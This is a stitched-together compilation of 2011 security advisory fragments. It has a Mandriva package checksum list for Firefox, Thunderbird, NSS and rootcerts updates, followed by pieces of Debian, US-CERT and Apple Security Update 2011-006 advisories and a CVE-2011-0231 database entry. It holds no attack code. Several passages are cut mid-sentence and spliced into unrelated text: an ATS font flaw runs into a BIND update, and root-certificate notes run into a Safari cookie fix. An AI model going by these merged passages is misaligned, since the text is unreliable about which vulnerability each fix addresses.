4227c55e25d1509ac587ec431eec7584 2011/x86_64/mozilla-thunderbird-pl-8.0-0.1-mdv2011.0.noarch.rpm
7c4cd80e546d1443d5f111eabe4eb78e 2011/x86_64/mozilla-thunderbird-pt_BR-8.0-0.1-mdv2011.0.noarch.rpm
7591264f5ef94b47454cc0a90479c555 2011/x86_64/mozilla-thunderbird-pt_PT-8.0-0.1-mdv2011.0.noarch.rpm
25075d821363e2389531ba264f7f2b47 2011/x86_64/mozilla-thunderbird-ru-8.0-0.1-mdv2011.0.noarch.rpm
5f277c4d4799c0fc3a301bb4c08be0e9 2011/x86_64/mozilla-thunderbird-si-8.0-0.1-mdv2011.0.noarch.rpm
e829d5063f0914d13ecb4b2bce7b437a 2011/x86_64/mozilla-thunderbird-sk-8.0-0.1-mdv2011.0.noarch.rpm
7cbc2cfefa6ab374abd4d7e01960674c 2011/x86_64/mozilla-thunderbird-sl-8.0-0.1-mdv2011.0.noarch.rpm
51191515c45463b8b665bc66c3467e11 2011/x86_64/mozilla-thunderbird-sq-8.0-0.1-mdv2011.0.noarch.rpm
56bc5cf14136f6a9a61f14f97a88475e 2011/x86_64/mozilla-thunderbird-sv_SE-8.0-0.1-mdv2011.0.noarch.rpm
69a6efab02af5c51be03662bab1e4bbd 2011/x86_64/mozilla-thunderbird-tr-8.0-0.1-mdv2011.0.noarch.rpm
ab1e6704655f24eb90b2749dc14e6823 2011/x86_64/mozilla-thunderbird-uk-8.0-0.1-mdv2011.0.noarch.rpm
5d3236e9f11ae231ad1af6978fc28916 2011/x86_64/mozilla-thunderbird-zh_TW-8.0-0.1-mdv2011.0.noarch.rpm
f3ad4788c4c84d7fed9a8fe6269ebdeb 2011/x86_64/nsinstall-8.0-0.1-mdv2011.0.x86_64.rpm
4c5d819e96b080bae0f26dcbf0e0fab3 2011/x86_64/nss-3.13.1-0.1-mdv2011.0.x86_64.rpm
50ec520f5e32f395b8d3484c80c7db57 2011/x86_64/rootcerts-20111103.00-1-mdv2011.0.x86_64.rpm
75bf74315d7453658f92c856d97430d5 2011/x86_64/rootcerts-java-20111103.00-1-mdv2011.0.x86_64.rpm
61bcb0f8fa18f7f4c07932829b6e47d4 2011/SRPMS/firefox-8.0-0.1.src.rpm
7d248eb9b27542d4f24a360d69798d36 2011/SRPMS/firefox-l10n-8.0-0.1.src.rpm
a96945e087712c9c72217abd42917dd5 2011/SRPMS/mozilla-thunderbird-8.0-0.1.src.rpm
a0d367a7922e9fb3472c8f3cf3f588c2 2011/SRPMS/mozilla-thunderbird-l10n-8.0-0.1.src.rpm
caebadfb72c1efd8c1c96921f6127dc5 2011/SRPMS/nss-3.13.1-0.1.src.rpm
3b77fd446a76fffc6268138dc69eff2d 2011/SRPMS/rootcerts-20111103.00-1.src.rpm
Mandriva Enterprise Server 5:
7bc935def286cc2ac44b8a24ef130653 mes5/i586/firefox-3.6.24-0.1mdvmes5.2.i586.rpm
77f014f179c6f7457250bd53de5307c2 mes5/i586/firefox-af-3.6.24-0.1mdvmes5.2.i586.rpm
b6333e512f90df9bb67b26d95e056ee7 mes5/i586/firefox-ar-3.6.24-0.1mdvmes5.2.i586.rpm
fdd9af758a033f3ac85e30913ba9f46b mes5/i586/firefox-be-3.6.24-0.1mdvmes5.2.i586.rpm
d8702538aee8bd51c4e35dc346d5a763 mes5/i586/firefox-bg-3.6.24-0.1mdvmes5.2.i586.rpm
6995704c1600c2e2ea117891aa762170 mes5/i586/firefox-bn-3.6.24-0.1mdvmes5.2.i586.rpm
0667c7a8df082c8b839e5da00954ca96 mes5/i586/firefox-ca-3.6.24-0.1mdvmes5.2.i586.rpm
bb059a973cbadfe3980a9d2391ab6703 mes5/i586/firefox-cs-3.6.24-0.1mdvmes5.2.i586.rpm
0f15ab2773f83549f5934299151547c8 mes5/i586/firefox-cy-3.6.24-0.1mdvmes5.2.i586.rpm
86d04a37f6a977f923923742bd07f627 mes5/i586/firefox-da-3.6.24-0.1mdvmes5.2.i586.rpm
536e44b964f0b892e985bfe96eed403c mes5/i586/firefox-de-3.6.24-0.1mdvmes5.2.i586.rpm
2ffee68b34e41c3468b13023342f9b40 mes5/i586/firefox-devel-3.6.24-0.1mdvmes5.2.i586.rpm
ac8aac296b4a6a8f52ad757d7f1b25b3 mes5/i586/firefox-el-3.6.24-0.1mdvmes5.2.i586.rpm
e5cf2c26749b751841a907ed2c22da79 mes5/i586/firefox-en_GB-3.6.24-0.1mdvmes5.2.i586.rpm
36c4d107f836eede983dfee4cd497df2 mes5/i586/firefox-eo-3.6.24-0.1mdvmes5.2.i586.rpm
fa29ad12de16bd19ea03bd0d30490fb9 mes5/i586/firefox-es_AR-3.6.24-0.1mdvmes5.2.i586.rpm
61500beaba17e66a6a46ebc1899f1fe0 mes5/i586/firefox-es_ES-3.6.24-0.1mdvmes5.2.i586.rpm
01873d30065fe6ca52d03a5c63317862 mes5/i586/firefox-et-3.6.24-0.1mdvmes5.2.i586.rpm
aeb5cf43fa914fe67c375751c206937f mes5/i586/firefox-eu-3.6.24-0.1mdvmes5.2.i586.rpm
4483beed2082f525b052e0ce0305dee5 mes5/i586/firefox-fi-3.6.24-0.1mdvmes5.2.i586.rpm
d38bf5c5ee8136b58cae5fc8b3234a40 mes5/i586/firefox-fr-3.6.24-0.1mdvmes5.2.i586.rpm
5286c72e2dcb2b9213b844627185a30c mes5/i586/firefox-fy-3.6.24-0.1mdvmes5.2.i586.rpm
b7b8018360544b2acd99aa4ad2393787 mes5/i586/firefox-ga_IE-3.6.24-0.1mdvmes5.2.i586.rpm
fa3e3a650d2180cb80e50ad6a8f41274 mes5/i586/firefox-gl-3.6.24-0.1mdvmes5.2.i586.rpm
ff7b9323133734045d587716271599c6 mes5/i586/firefox-gu_IN-3.6.24-0.1mdvmes5.2.i586.rpm
7f3bdaf20f1847d1527b4b5bf3bda062 mes5/i586/firefox-he-3.6.24-0.1mdvmes5.2.i586.rpm
1ff1d9f33129dbb358abf98e7fb41e88 mes5/i586/firefox-hi-3.6.24-0.1mdvmes5.2.i586.rpm
7f2ff18cf54b9bf747e234e07e2ebe2a mes5/i586/firefox-hu-3.6.24-0.1mdvmes5.2.i586.rpm
11610817d27fe2dfe31d5a834e362b1a mes5/i586/firefox-id-3.6.24-0.1mdvmes5.2.i586.rpm
01301dc5e9b9866c9c9e2cde1b3f3204 mes5/i586/firefox-is-3.6.24-0.1mdvmes5.2.i586.rpm
6fc90fd037d07be837b2141837599c9b mes5/i586/firefox-it-3.6.24-0.1mdvmes5.2.i586.rpm
5cbe9e6e60feca53d85a8b18dee267b0 mes5/i586/firefox-ja-3.6.24-0.1mdvmes5.2.i586.rpm
df444d6239955c4c7c26f27adf186273 mes5/i586/firefox-ka-3.6.24-0.1mdvmes5.2.i586.rpm
fe8b329e1891a6ef2c3d523fd1d9f770 mes5/i586/firefox-kn-3.6.24-0.1mdvmes5.2.i586.rpm
6bb81389dd225f4912061b0e8aa5cbf5 mes5/i586/firefox-ko-3.6.24-0.1mdvmes5.2.i586.rpm
dbb44e867e031dd572c73d60d56a8832 mes5/i586/firefox-ku-3.6.24-0.1mdvmes5.2.i586.rpm
0673e5fbb202d335d192463681b6eb7c mes5/i586/firefox-lt-3.6.24-0.1mdvmes5.2.i586.rpm
b7b2ef5d885349fceb800229e9da5d57 mes5/i586/firefox-lv-3.6.24-0.1mdvmes5.2.i586.rpm
45bc60eecd28598664a3da58196911b1 mes5/i586/firefox-mk-3.6.24-0.1mdvmes5.2.i586.rpm
b2238d16ac1ed690dc8d3d643a1e0fb6 mes5/i586/firefox-mr-3.6.24-0.1mdvmes5.2.i586.rpm
ab62d195234f9ee5707ba72a70437fad mes5/i586/firefox-nb_NO-3.6.24-0.1mdvmes5.2.i586.rpm
5841d3e0b3062c1baa1cf859be5f8b9e mes5/i586/firefox-nl-3.6.24-0.1mdvmes5.2.i586.rpm
92a77eac6cdeb7acb02b994a72335545 mes5/i586/firefox-nn_NO-3.6.24-0.1mdvmes5.2.i586.rpm
f87cb2a50de52763254befcdf168bc71 mes5/i586/firefox-oc-3.6.24-0.1mdvmes5.2.i586.rpm
d0d3bf3409fc0f047d03ea7c6c18d2ac mes5/i586/firefox-pa_IN-3.6.24-0.1mdvmes5.2.i586.rpm
5a8d05025b14e07d0707787b8c0034a1 mes5/i586/firefox-pl-3.6.24-0.1mdvmes5.2.i586.rpm
793cf7505894cce011cb230bd29eae23 mes5/i586/firefox-pt_BR-3.6.24-0.1mdvmes5.2.i586.rpm
a42aa4cfdf0572aa4c32a521390ac616 mes5/i586/firefox-pt_PT-3.6.24-0.1mdvmes5.2.i586.rpm
ea0a9122fe79e46dc4acb3550789406b mes5/i586/firefox-ro-3.6.24-0.1mdvmes5.2.i586.rpm
6cfffe49d815e4d2bb013b50125f9df2 mes5/i586/firefox-ru-3.6.24-0.1mdvmes5.2.i586.rpm
8f05c1e671f673d91463c9e3f18d5106 mes5/i586/firefox-si-3.6.24-0.1mdvmes5.2.i586.rpm
aeb04cd14d14c32174bdf12db245c50a mes5/i586/firefox-sk-3.6.24-0.1mdvmes5.2.i586.rpm
2d97dcebf9747907844d2b6d99be4c17 mes5/i586/firefox-sl-3.6.24-0.1mdvmes5.2.i586.rpm
dc46dfbc57f2f74d4eb598893162b374 mes5/i586/firefox-sq-3.6.24-0.1mdvmes5.2.i586.rpm
e23ea9ae7be9cb36ce1d15c947beb9be mes5/i586/firefox-sr-3.6.24-0.1mdvmes5.2.i586.rpm
9b818f36dd59fe28b634923f7e87f459 mes5/i586/firefox-sv_SE-3.6.24-0.1mdvmes5.2.i586.rpm
c2e578f26a9b62c2892529bd31f71599 mes5/i586/firefox-te-3.6.24-0.1mdvmes5.2.i586.rpm
d40479b3af3352c3a764be56c7e94054 mes5/i586/firefox-th-3.6.24-0.1mdvmes5.2.i586.rpm
9424a6836ad3c342bb914ae740c4df2f mes5/i586/firefox-tr-3.6.24-0.1mdvmes5.2.i586.rpm
ac28522d0d06455d3e4dc1f04be78691 mes5/i586/firefox-uk-3.6.24-0.1mdvmes5.2.i586.rpm
a22cfaeb750773cd380f9707cfa17b50 mes5/i586/firefox-zh_CN-3.6.24-0.1mdvmes5.2.i586.rpm
bc8236f6bc946cfc3f27ca5d7077618a mes5/i586/firefox-zh_TW-3.6.24-0.1mdvmes5.2.i586.rpm
bc3e456f9e3552c6db1abbc6fb79cc3a mes5/i586/gnome-python-extras-2.19.1-20.33mdvmes5.2.i586.rpm
7bbad1236c5f2cec80e9ac120505faa1 mes5/i586/gnome-python-gda-2.19.1-20.33mdvmes5.2.i586.rpm
64ab9fd3d78199a813f6d952943cf439 mes5/i586/gnome-python-gda-devel-2.19.1-20.33mdvmes5.2.i586.rpm
1975b5043390ec31858bd881138c104d mes5/i586/gnome-python-gdl-2.19.1-20.33mdvmes5.2.i586.rpm
ceb966e16e9d55ca3d2e279a4f4e797b mes5/i586/gnome-python-gtkhtml2-2.19.1-20.33mdvmes5.2.i586.rpm
a3e4519d811da10f48213fc4cee3d33c mes5/i586/gnome-python-gtkmozembed-2.19.1-20.33mdvmes5.2.i586.rpm
ac0c1709cda7547d62a9dbb88f553922 mes5/i586/gnome-python-gtkspell-2.19.1-20.33mdvmes5.2.i586.rpm
cbab94c485ca9e409bde197e491f25f8 mes5/i586/libnss3-3.13.1-0.1mdvmes5.2.i586.rpm
ad85a689ed516555e241d4329f08cc0b mes5/i586/libnss-devel-3.13.1-0.1mdvmes5.2.i586.rpm
41d768c263a3e67e8eec11b40d1bdbb9 mes5/i586/libnss-static-devel-3.13.1-0.1mdvmes5.2.i586.rpm
5434f4bcd99f1c76e54a7cef027c7316 mes5/i586/libxulrunner1.9.2.24-1.9.2.24-0.1mdvmes5.2.i586.rpm
98890700ec43c4d686bf505d648e0ff7 mes5/i586/libxulrunner-devel-1.9.2.24-0.1mdvmes5.2.i586.rpm
3edc3e0b28173775a02f593f5c87057d mes5/i586/nss-3.13.1-0.1mdvmes5.2.i586.rpm
c09835deb2f25e9d79a3c3feb48b626c mes5/i586/rootcerts-20111103.00-1mdvmes5.2.i586.rpm
5cfbf1f643efb1e0c6058968dc80ea98 mes5/i586/rootcerts-java-20111103.00-1mdvmes5.2.i586.rpm
0b45eff4a1a9151d7fde6b0558ef69cc mes5/i586/xulrunner-1.9.2.24-0.1mdvmes5.2.i586.rpm
334d278747c36afff281004f0bff3979 mes5/i586/yelp-2.24.0-3.34mdvmes5.2.i586.rpm
9e013eb1be80e1e9affebf09734f9fc7 mes5/SRPMS/firefox-3.6.24-0.1mdvmes5.2.src.rpm
4c8844d9f6b187b580204be96cb0a26b mes5/SRPMS/firefox-l10n-3.6.24-0.1mdvmes5.2.src.rpm
2fabc2a8cbca585a5be3ec2ca65193f6 mes5/SRPMS/gnome-python-extras-2.19.1-20.33mdvmes5.2.src.rpm
bf0c0e4fb79b32fefc773fc978696867 mes5/SRPMS/nss-3.13.1-0.1mdvmes5.2.src.rpm
c73ae336747eae33d9921d036a2f354f mes5/SRPMS/rootcerts-20111103.00-1mdvmes5.2.src.rpm
f8d3b47c62985227261d18ee53e80644 mes5/SRPMS/xulrunner-1.9.2.24-0.1mdvmes5.2.src.rpm
cdaba275e53ff7abceb4fe941eb04bf3 mes5/SRPMS/yelp-2.24.0-3.34mdvmes5.2.src.rpm
Mandriva Enterprise Server 5/X86_64:
32ef3bfd81680345d51d7adf1b14320d mes5/x86_64/firefox-3.6.24-0.1mdvmes5.2.x86_64.rpm
81e8fd4ea24ee87f8bed5395c9e5ff2e mes5/x86_64/firefox-af-3.6.24-0.1mdvmes5.2.x86_64.rpm
c64b2816ae21d6c2cb19d8a7f2c517ae mes5/x86_64/firefox-ar-3.6.24-0.1mdvmes5.2.x86_64.rpm
23093071bdba0808977d0581d9d0a5cf mes5/x86_64/firefox-be-3.6.24-0.1mdvmes5.2.x86_64.rpm
dedd8b20153d47955833d3a44d40079d mes5/x86_64/firefox-bg-3.6.24-0.1mdvmes5.2.x86_64.rpm
479795a53f43f8353eb996fd0acb0ac8 mes5/x86_64/firefox-bn-3.6.24-0.1mdvmes5.2.x86_64.rpm
7276306b3e8a47968bff714b77fb6932 mes5/x86_64/firefox-ca-3.6.24-0.1mdvmes5.2.x86_64.rpm
5c874350ea322e2ce221a4b8c1c4d749 mes5/x86_64/firefox-cs-3.6.24-0.1mdvmes5.2.x86_64.rpm
eb75ca3daa02bd991d22e5348ebd93f0 mes5/x86_64/firefox-cy-3.6.24-0.1mdvmes5.2.x86_64.rpm
807decb9c15601c1a0ec8aff920f5bcb mes5/x86_64/firefox-da-3.6.24-0.1mdvmes5.2.x86_64.rpm
62b12170f7e5d868feb4534694421c59 mes5/x86_64/firefox-de-3.6.24-0.1mdvmes5.2.x86_64.rpm
19837b0159c79b3c6c2a79c5fd2f1c14 mes5/x86_64/firefox-devel-3.6.24-0.1mdvmes5.2.x86_64.rpm
744a5e19043d7899e0f217b0ea789058 mes5/x86_64/firefox-el-3.6.24-0.1mdvmes5.2.x86_64.rpm
8f8102c907b1da44041a6cb07381be03 mes5/x86_64/firefox-en_GB-3.6.24-0.1mdvmes5.2.x86_64.rpm
6e1401440caaa047cabd88305fb141b4 mes5/x86_64/firefox-eo-3.6.24-0.1mdvmes5.2.x86_64.rpm
94bbb02fd7554c9b5c6cf7608aee8e2d mes5/x86_64/firefox-es_AR-3.6.24-0.1mdvmes5.2.x86_64.rpm
51dffbdca27933a95c51c490581b8236 mes5/x86_64/firefox-es_ES-3.6.24-0.1mdvmes5.2.x86_64.rpm
d481d414e32d08ab51b90ce102e9aac6 mes5/x86_64/firefox-et-3.6.24-0.1mdvmes5.2.x86_64.rpm
379385d6ccb36050db9fb18cb962afc2 mes5/x86_64/firefox-eu-3.6.24-0.1mdvmes5.2.x86_64.rpm
03eb83bf172d39a5c577d06dcaa98b4b mes5/x86_64/firefox-fi-3.6.24-0.1mdvmes5.2.x86_64.rpm
4635d042b060f3942adf96c7c0257a8e mes5/x86_64/firefox-fr-3.6.24-0.1mdvmes5.2.x86_64.rpm
5dfddaf5d15034a151d0b2a345533459 mes5/x86_64/firefox-fy-3.6.24-0.1mdvmes5.2.x86_64.rpm
4f7606ea10662426dadebbdb69eb8ee5 mes5/x86_64/firefox-ga_IE-3.6.24-0.1mdvmes5.2.x86_64.rpm
15ec5ff60db290ae4f5e61f30668d35d mes5/x86_64/firefox-gl-3.6.24-0.1mdvmes5.2.x86_64.rpm
6f2a47ccb489fed06559e16131c33d92 mes5/x86_64/firefox-gu_IN-3.6.24-0.1mdvmes5.2.x86_64.rpm
3a510e388f78507c4cccab74af2ac330 mes5/x86_64/firefox-he-3.6.24-0.1mdvmes5.2.x86_64.rpm
bde92fda328269dc3e344a922098f76c mes5/x86_64/firefox-hi-3.6.24-0.1mdvmes5.2.x86_64.rpm
ed586b83fba559c33462663829ae6beb mes5/x86_64/firefox-hu-3.6.24-0.1mdvmes5.2.x86_64.rpm
dd0bb44e2fa5f65707d123b93da397b2 mes5/x86_64/firefox-id-3.6.24-0.1mdvmes5.2.x86_64.rpm
1b4956d38cca1d6ae3e952828f19b60d mes5/x86_64/firefox-is-3.6.24-0.1mdvmes5.2.x86_64.rpm
ab7e32516ad44993d98ffcc79d838e4c mes5/x86_64/firefox-it-3.6.24-0.1mdvmes5.2.x86_64.rpm
bef523dfc895e0631f64c307b0151934 mes5/x86_64/firefox-ja-3.6.24-0.1mdvmes5.2.x86_64.rpm
5a43b89d3266d33f522c4235bfc1b898 mes5/x86_64/firefox-ka-3.6.24-0.1mdvmes5.2.x86_64.rpm
6a68e2052ed6f9e6d4edb85fc02f01d1 mes5/x86_64/firefox-kn-3.6.24-0.1mdvmes5.2.x86_64.rpm
56c2e1b4968a3a78708408e6b8d2f1c8 mes5/x86_64/firefox-ko-3.6.24-0.1mdvmes5.2.x86_64.rpm
aabd6c956361d0d5a96a1b7235c860b6 mes5/x86_64/firefox-ku-3.6.24-0.1mdvmes5.2.x86_64.rpm
389c6952e094f793d2a33480af9d1b88 mes5/x86_64/firefox-lt-3.6.24-0.1mdvmes5.2.x86_64.rpm
49c9259336e88b67df4513865a685107 mes5/x86_64/firefox-lv-3.6.24-0.1mdvmes5.2.x86_64.rpm
c5c1f1ddac0f232f7318afc9563a5e8c mes5/x86_64/firefox-mk-3.6.24-0.1mdvmes5.2.x86_64.rpm
5746b3ad522ff6b6e8013be0d681ba3c mes5/x86_64/firefox-mr-3.6.24-0.1mdvmes5.2.x86_64.rpm
19c7a026745717808c71de9b460835a7 mes5/x86_64/firefox-nb_NO-3.6.24-0.1mdvmes5.2.x86_64.rpm
6ba64b21d85ddfe8e3d46b00b06a28ed mes5/x86_64/firefox-nl-3.6.24-0.1mdvmes5.2.x86_64.rpm
33b5f2a848effaebecc5efbfc58d5830 mes5/x86_64/firefox-nn_NO-3.6.24-0.1mdvmes5.2.x86_64.rpm
cb7e2ef26d4764b5ffb27941eeba2394 mes5/x86_64/firefox-oc-3.6.24-0.1mdvmes5.2.x86_64.rpm
3f7561bd1333336b87706e7c0ab16b6d mes5/x86_64/firefox-pa_IN-3.6.24-0.1mdvmes5.2.x86_64.rpm
d21b5475afc6c772ef7962bcc1fab62a mes5/x86_64/firefox-pl-3.6.24-0.1mdvmes5.2.x86_64.rpm
9b21a8a51ed7bc0d82424452959b06d8 mes5/x86_64/firefox-pt_BR-3.6.24-0.1mdvmes5.2.x86_64.rpm
b402819f8defd6d5e4734ed2a7677c6d mes5/x86_64/firefox-pt_PT-3.6.24-0.1mdvmes5.2.x86_64.rpm
09b1ada62ba3321a5e1b8c8e7fe694bb mes5/x86_64/firefox-ro-3.6.24-0.1mdvmes5.2.x86_64.rpm
9f8bbdf548d49e5bef58b9c346b55d31 mes5/x86_64/firefox-ru-3.6.24-0.1mdvmes5.2.x86_64.rpm
5328c1e1426904cdeb846a18f63d8119 mes5/x86_64/firefox-si-3.6.24-0.1mdvmes5.2.x86_64.rpm
9624222aa45e57f2c029519f34caec9d mes5/x86_64/firefox-sk-3.6.24-0.1mdvmes5.2.x86_64.rpm
d6ae46b2107f886f389d0c38b1293804 mes5/x86_64/firefox-sl-3.6.24-0.1mdvmes5.2.x86_64.rpm
904eedebac35192f211acf86dfb54e2c mes5/x86_64/firefox-sq-3.6.24-0.1mdvmes5.2.x86_64.rpm
472063aa67a4af3c09594a059bbc5c53 mes5/x86_64/firefox-sr-3.6.24-0.1mdvmes5.2.x86_64.rpm
bbf8198e8d9440591294f6452ea4db6e mes5/x86_64/firefox-sv_SE-3.6.24-0.1mdvmes5.2.x86_64.rpm
1c4df8e114d765648d9c0880311d6055 mes5/x86_64/firefox-te-3.6.24-0.1mdvmes5.2.x86_64.rpm
93689fedb615f0b4e096671eb2471777 mes5/x86_64/firefox-th-3.6.24-0.1mdvmes5.2.x86_64.rpm
8aff295068c2b83468a19a207de882eb mes5/x86_64/firefox-tr-3.6.24-0.1mdvmes5.2.x86_64.rpm
06f4b07bbad943c6ff3eeb6903818027 mes5/x86_64/firefox-uk-3.6.24-0.1mdvmes5.2.x86_64.rpm
6127edc3cc63e25c9911e3ed2798a2cb mes5/x86_64/firefox-zh_CN-3.6.24-0.1mdvmes5.2.x86_64.rpm
bd954f9b501aac83c9524f64cf99b9d2 mes5/x86_64/firefox-zh_TW-3.6.24-0.1mdvmes5.2.x86_64.rpm
ecc48bc21f75335a3b4ca35b95c57676 mes5/x86_64/gnome-python-extras-2.19.1-20.33mdvmes5.2.x86_64.rpm
9081f49761809112855712639f1ee74f mes5/x86_64/gnome-python-gda-2.19.1-20.33mdvmes5.2.x86_64.rpm
5d5a83b1c5404aee111eded2eada5d7a mes5/x86_64/gnome-python-gda-devel-2.19.1-20.33mdvmes5.2.x86_64.rpm
1d52d8ccd082567982fb8da6beaeecb2 mes5/x86_64/gnome-python-gdl-2.19.1-20.33mdvmes5.2.x86_64.rpm
741d2c0841ea11c6ec14b500a348ae68 mes5/x86_64/gnome-python-gtkhtml2-2.19.1-20.33mdvmes5.2.x86_64.rpm
545ee4c82ca799d1ca88863a8a461851 mes5/x86_64/gnome-python-gtkmozembed-2.19.1-20.33mdvmes5.2.x86_64.rpm
697e0bb9ccf93c433da87896736c9577 mes5/x86_64/gnome-python-gtkspell-2.19.1-20.33mdvmes5.2.x86_64.rpm
57ec0e8c65a470a380d845bb9ababc7a mes5/x86_64/lib64nss3-3.13.1-0.1mdvmes5.2.x86_64.rpm
b80789bb4724fa8fc22848fc259edd90 mes5/x86_64/lib64nss-devel-3.13.1-0.1mdvmes5.2.x86_64.rpm
a59d270616272f9eac89d34577d74931 mes5/x86_64/lib64nss-static-devel-3.13.1-0.1mdvmes5.2.x86_64.rpm
42700c5b0e5a51f4d19e9b494ec99c1d mes5/x86_64/lib64xulrunner1.9.2.24-1.9.2.24-0.1mdvmes5.2.x86_64.rpm
816c38e09c360151d10e996238001e7c mes5/x86_64/lib64xulrunner-devel-1.9.2.24-0.1mdvmes5.2.x86_64.rpm
9301e07427ad1da3be0a3f8c401cbeaa mes5/x86_64/nss-3.13.1-0.1mdvmes5.2.x86_64.rpm
b42504bc6f1b2ef9496dabc38bea2efe mes5/x86_64/rootcerts-20111103.00-1mdvmes5.2.x86_64.rpm
3e5598b25dee94d67c4efc9182caadf5 mes5/x86_64/rootcerts-java-20111103.00-1mdvmes5.2.x86_64.rpm
8ac2c9d706430b19eb3356d445ecbf39 mes5/x86_64/xulrunner-1.9.2.24-0.1mdvmes5.2.x86_64.rpm
906b5d1845c09a63c3ec521b648ec898 mes5/x86_64/yelp-2.24.0-3.34mdvmes5.2.x86_64.rpm
9e013eb1be80e1e9affebf09734f9fc7 mes5/SRPMS/firefox-3.6.24-0.1mdvmes5.2.src.rpm
4c8844d9f6b187b580204be96cb0a26b mes5/SRPMS/firefox-l10n-3.6.24-0.1mdvmes5.2.src.rpm
2fabc2a8cbca585a5be3ec2ca65193f6 mes5/SRPMS/gnome-python-extras-2.19.1-20.33mdvmes5.2.src.rpm
bf0c0e4fb79b32fefc773fc978696867 mes5/SRPMS/nss-3.13.1-0.1mdvmes5.2.src.rpm
c73ae336747eae33d9921d036a2f354f mes5/SRPMS/rootcerts-20111103.00-1mdvmes5.2.src.rpm
f8d3b47c62985227261d18ee53e80644 mes5/SRPMS/xulrunner-1.9.2.24-0.1mdvmes5.2.src.rpm
cdaba275e53ff7abceb4fe941eb04bf3 mes5/SRPMS/yelp-2.24.0-3.34mdvmes5.2.src.rpm
_______________________________________________________________________
To upgrade automatically use MandrivaUpdate or urpmi. The verification
of md5 checksums and GPG signatures is performed automatically for you.
All packages are signed by Mandriva for security. You can obtain the
GPG public key of the Mandriva Security Team by executing:
gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98
You can view other update advisories for Mandriva Linux at:
http://www.mandriva.com/security/advisories
If you want to report vulnerabilities, please contact
security_(at)_mandriva.com
_______________________________________________________________________
Type Bits/KeyID Date User ID
pub 1024D/22458A98 2000-07-10 Mandriva Security Team
<security*mandriva.com>
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.11 (GNU/Linux)
iD8DBQFOusoVmqjQ0CJFipgRAiCRAKDjo1alvE84bpzDKSblXWzx145ZHgCeLWG4
CKHT5ruQSzG7lkDlCWLJgHQ=
=8tzm
-----END PGP SIGNATURE-----
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
. Bhd" certificate authority. More information can be found
in the Mozilla Security Blog:
http://blog.mozilla.com/security/2011/11/03/revoking-trust-in-digicert-sdn-bhd-intermediate-certificate-authority/
This update also fixes an insecure load path for pkcs11.txt configuration
file (CVE-2011-3640).
For the oldstable distribution (lenny), this problem has been fixed in
version 3.12.3.1-0lenny7.
For the stable distribution (squeeze), this problem has been fixed in
version 3.12.8-1+squeeze4.
For the unstable distribution (sid), this problem has been fixed in
version 3.13.1.with.ckbi.1.88-1.
We recommend that you upgrade your nss packages
VAR-201110-0053 | CVE-2011-0231 | Apple Mac OS X of CFNetwork User-trackable vulnerabilities |
CVSS V2: 5.0 CVSS V3: - Severity: MEDIUM |
CFNetwork in Apple Mac OS X before 10.7.2 does not properly follow an intended cookie-storage policy, which makes it easier for remote web servers to track users via a cookie, related to a "synchronization issue.".
The update addresses new vulnerabilities that affect Application Firewall, ATS, CFNetwork, CoreMedia, CoreProcesses, CoreStorage, File Systems, IOGraphics, Kernel, MediaKit, Open Directory, QuickTime, SMB File Server, User Documentation, and libsecurity. Apple Mac OS X is prone to a security vulnerability that has been addressed in Security Update 2011-006.
Attackers can exploit this issue to bypass certain security restrictions and to store cookies. Other attacks may also be possible.
The following are vulnerable:
Mac OS X versions 10.6.8 and prior
Mac OS X Server versions 10.6.8 and prior. Apple has
released updates to address these vulnerabilities.
I. Apple has released updates to address these
vulnerabilities.
II. Impact
A remote, unauthenticated attacker could execute arbitrary code,
cause a denial of service, or gain unauthorized access to your
files or system.
III. This advisory describes any known issues related to the
updates and the specific impacts for each vulnerability.
Administrators are encouraged to note these issues and impacts and
test for any potentially adverse effects before wide-scale
deployment.
IV. Please send
email to <cert@cert.org> with "TA11-286A Feedback VU#421739" in
the subject.
____________________________________________________________________
For instructions on subscribing to or unsubscribing from this
mailing list, visit <http://www.us-cert.gov/cas/signup.html>.
____________________________________________________________________
Produced 2011 by US-CERT, a government organization.
Terms of use:
<http://www.us-cert.gov/legal.html>
____________________________________________________________________
Revision History
October 13, 2011: Initial release
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.5 (GNU/Linux)
iQEVAwUBTpb8zj/GkGVXE7GMAQI21Af/SHWzIangqPW9vtuG/MQWSBMy9nG4wIZS
DUEAWBEMPTKF3fLrIy6TVpRLN3q/q4dCYXzM4lec4IzKvEbV/bUyg15xEfYdxB0v
s/vARGNwf7tjSbjo+PaHLuSZ1HLn/GLO3CXaf+ut/Kb8y9Fsir5klMgrCX/N0JkY
dLoV9R6zGs1aQzmF9ULB1IQ2/lUkg6CGnyARh0prfhRFwKfu7NZXb8yz5ex68q6V
NF6j9l+XK0Cl4K7R+0ESD4e47jLCg6iN175O8VzrlxiRvBRAyTaFycdMB4uSkmii
xu8SqU2QFhsIJy8J+i1Bb6kuWkaxAnUbxO4tRrmXoqTXl9m0CtpnWA==
=3Wp2
-----END PGP SIGNATURE-----
. Further
information is available via the Apache web site at
http://httpd.apache.org/
CVE-ID
CVE-2011-0419
CVE-2011-3192
Application Firewall
Available for: Mac OS X v10.6.8, Mac OS X Server v10.6.8,
OS X Lion v10.7 and v10.7.1, OS X Lion Server v10.7 and v10.7.1
Impact: Executing a binary with a maliciously crafted name may lead
to arbitrary code execution with elevated privileges
Description: A format string vulnerability existed in Application
Firewall's debug logging.
CVE-ID
CVE-2011-0185 : an anonymous reporter
ATS
Available for: OS X Lion v10.7 and v10.7.1,
OS X Lion Server v10.7 and v10.7.1
Impact: Viewing or downloading a document containing a maliciously
crafted embedded font may lead to arbitrary code execution
Description: A signedness issue existed in ATS' handling of Type 1
fonts.
CVE-ID
CVE-2011-3437
ATS
Available for: Mac OS X v10.6.8, Mac OS X Server v10.6.8
Impact: Viewing or downloading a document containing a maliciously
crafted embedded font may lead to arbitrary code execution
Description: An out of bounds memory access issue existed in ATS'
handling of Type 1 fonts. These issues are addressed by updating BIND to version
9.7.3-P3.
These issues are addressed by updating BIND to version 9.6-ESV-R4-P3.
Impact: Root certificates have been updated
Description: Several trusted certificates were added to the list of
system roots. Several existing certificates were updated to their
most recent version. The complete list of recognized system roots may
be viewed via the Keychain Access application. Safari's cookie preferences may not be honored,
allowing websites to set cookies that would be blocked were the
preference enforced. This update addresses the issue through improved
handling of cookie storage.
CVE-ID
